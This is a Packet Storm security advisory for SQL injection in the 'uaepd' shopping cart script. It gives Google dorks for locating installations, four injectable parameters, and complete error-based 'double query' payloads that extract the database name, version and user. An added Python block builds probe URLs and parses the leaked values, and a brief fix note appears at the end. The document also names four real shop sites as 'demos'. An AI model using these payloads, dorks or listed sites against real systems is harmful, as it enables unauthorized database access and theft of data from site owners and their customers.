Packet Storm ID: PACKETSTORM:124723
Published: Jan 08, 2014

UAEPD Shopping Script SQL Injection

Author: AtT4CKxT3rR0r1ST
Source: packetstormsecurity.com
uaepd script - Multiple SQL Injection Vulnerabilities  
====================================================================  
  
####################################################################  
.:. Author : AtT4CKxT3rR0r1ST  
.:. Contact : [[email protected]] , [[email protected]]  
.:. Home : http://www.iphobos.com/blog/  
.:. Script : http://www.uaepd.net/  
.:. Dork : [1]inurl:"products.php?cat_id=" "Powered by: PD "  
[2]inurl:"products.php?p_id" "Powered by: PD "  
[3]inurl:"page.php?id=" "Powered by: PD "  
[4]inurl:"news.php?id=" "Powered by: PD "  
####################################################################  
  
I. INTRODUCTION  
  
uaepd script is an Arabic shopping cart script with many features.  
  
II. DESCRIPTION  
  
#Control panel available in Arabic or English.  
#Store front viewable by visitors in Arabic and English.  
#Option to run the store in a single language or in both.  
#Unlimited number of pages can be added.  
#Formatting options for all store pages.  
#YouTube links and images can be added to every store page.  
#Main and sub categories can be added.  
#Unlimited number of products.  
#Multiple images per product.  
#Size and colour options for each product.  
#Logo printed on product images automatically.  
#Per-region shipping prices.  
#Shopping-cart purchase system.  
#Can be run with or without a member (registration) system.  
#Three payment methods: bank transfer, payment on receipt, and PayPal.  
#Automatic e-mail on every purchase or booking.  
#Product search feature.  
#Multiple currency support.  
#Comprehensive statistics for purchases and bookings.  
#Guestbook section.  
#Advertising spaces in multiple places.  
#Scrolling text bar (ticker).  
#Store can be closed or opened.  
  
III. BUG TYPE  
  
SQL injection (error-based, "double query" technique)  
  
IV. BUG  
  
site/products.php?cat_id=[sql injection]  
site/products.php?p_id=[sql injection]  
site/page.php?id=[sql injection]  
site/news.php?id=[sql injection]  
  
V. EXPLOIT  
  
TO EXTRACT DATABASE NAME, VERSION AND USER:  
  
site/products.php?cat_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
site/products.php?p_id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
site/page.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
site/news.php?id=99999+and (select 1 from (select count(*),concat((select(select concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
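As an added example (not part of the original advisory and not code from the uaepd project), the following Python shows how the double-query payload above works and how its result is read back. MySQL evaluates rand(0) more than once per row while GROUP BY builds its temporary table, and rand(0) yields the fixed sequence 0,1,1,0,1,1,..., so the computed key ending in "~1" is seen twice and MySQL raises ERROR 1062 "Duplicate entry ... for key 'group_key'" with the injected subquery output embedded in it. The host name, the four endpoint/parameter pairs are taken from the advisory; the response body is constructed to imitate a PHP page that echoes the MySQL error; nothing is sent over the network.

```python
import re
from urllib.parse import quote

# The advisory's double-query payload, kept as one string so it can be placed
# in any of the four affected GET parameters. database():version():user() is
# joined with ':' (0x3a) and terminated with '~' (0x7e); concat() then appends
# floor(rand(0)*2), so the colliding GROUP BY key always ends in '~1'.
PAYLOAD = (
    "99999 and (select 1 from (select count(*),concat((select(select "
    "concat(cast(concat(database(),0x3a,version(),0x3a,user()) as char),0x7e)) "
    "from information_schema.tables limit 0,1),floor(rand(0)*2))x "
    "from information_schema.tables group by x)a) and 1=1"
)

# Affected scripts and parameters, as listed in section IV of the advisory.
AFFECTED = [
    ("products.php", "cat_id"),
    ("products.php", "p_id"),
    ("page.php", "id"),
    ("news.php", "id"),
]

# MySQL reports the collision as ERROR 1062. Older servers write the key as
# 'group_key', MySQL 8 writes it as '<group_key>'; the pattern accepts both.
DUP_RE = re.compile(r"Duplicate entry '(.*?)~1' for key '<?group_key>?'")


def build_urls(base):
    """Return one probe URL per affected parameter with the payload URL-encoded.
    `base` is a constructed site root such as http://shop.example (assumption)."""
    return [
        f"{base.rstrip('/')}/{script}?{param}={quote(PAYLOAD, safe='')}"
        for script, param in AFFECTED
    ]


def parse_leak(body):
    """Pull database, version and user out of a MySQL duplicate-key error that
    the page echoed. Returns None when the body carries no such error, which
    is what a patched target (integer cast / bound parameter) would show."""
    m = DUP_RE.search(body)
    if not m:
        return None
    database, version, user = m.group(1).split(":", 2)
    return {"database": database, "version": version, "user": user}


# Constructed response body: what a PHP page printing mysql_error() looks like
# when the payload fires. Values are made up for this example.
SAMPLE_RESPONSE = (
    "<html><body><b>Warning</b>: Duplicate entry "
    "'shop_db:5.5.40-0ubuntu0.14.04.1:shop_user@localhost~1' for key 'group_key'"
    "</body></html>"
)

if __name__ == "__main__":
    for url in build_urls("http://shop.example"):
        print(url)
    print(parse_leak(SAMPLE_RESPONSE))
```

A `None` from `parse_leak` on a live target usually means either that the application no longer echoes database errors or that the parameter is no longer reaching the SQL parser as raw text; the application-side fix for all four parameters is to treat them as integers (an `(int)` cast or a bound parameter in a prepared statement), after which the expression above never becomes part of the query.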
  
DEMOS:  
  
http://sedenshop.com/products.php?p_id=3  
  
http://www.henna.ae/products.php?cat_id=1  
  
http://www.shah-een.com/news.php?id=1  
  
http://www.nourita.com/products.php?cat_id=4  
  
####################################################################  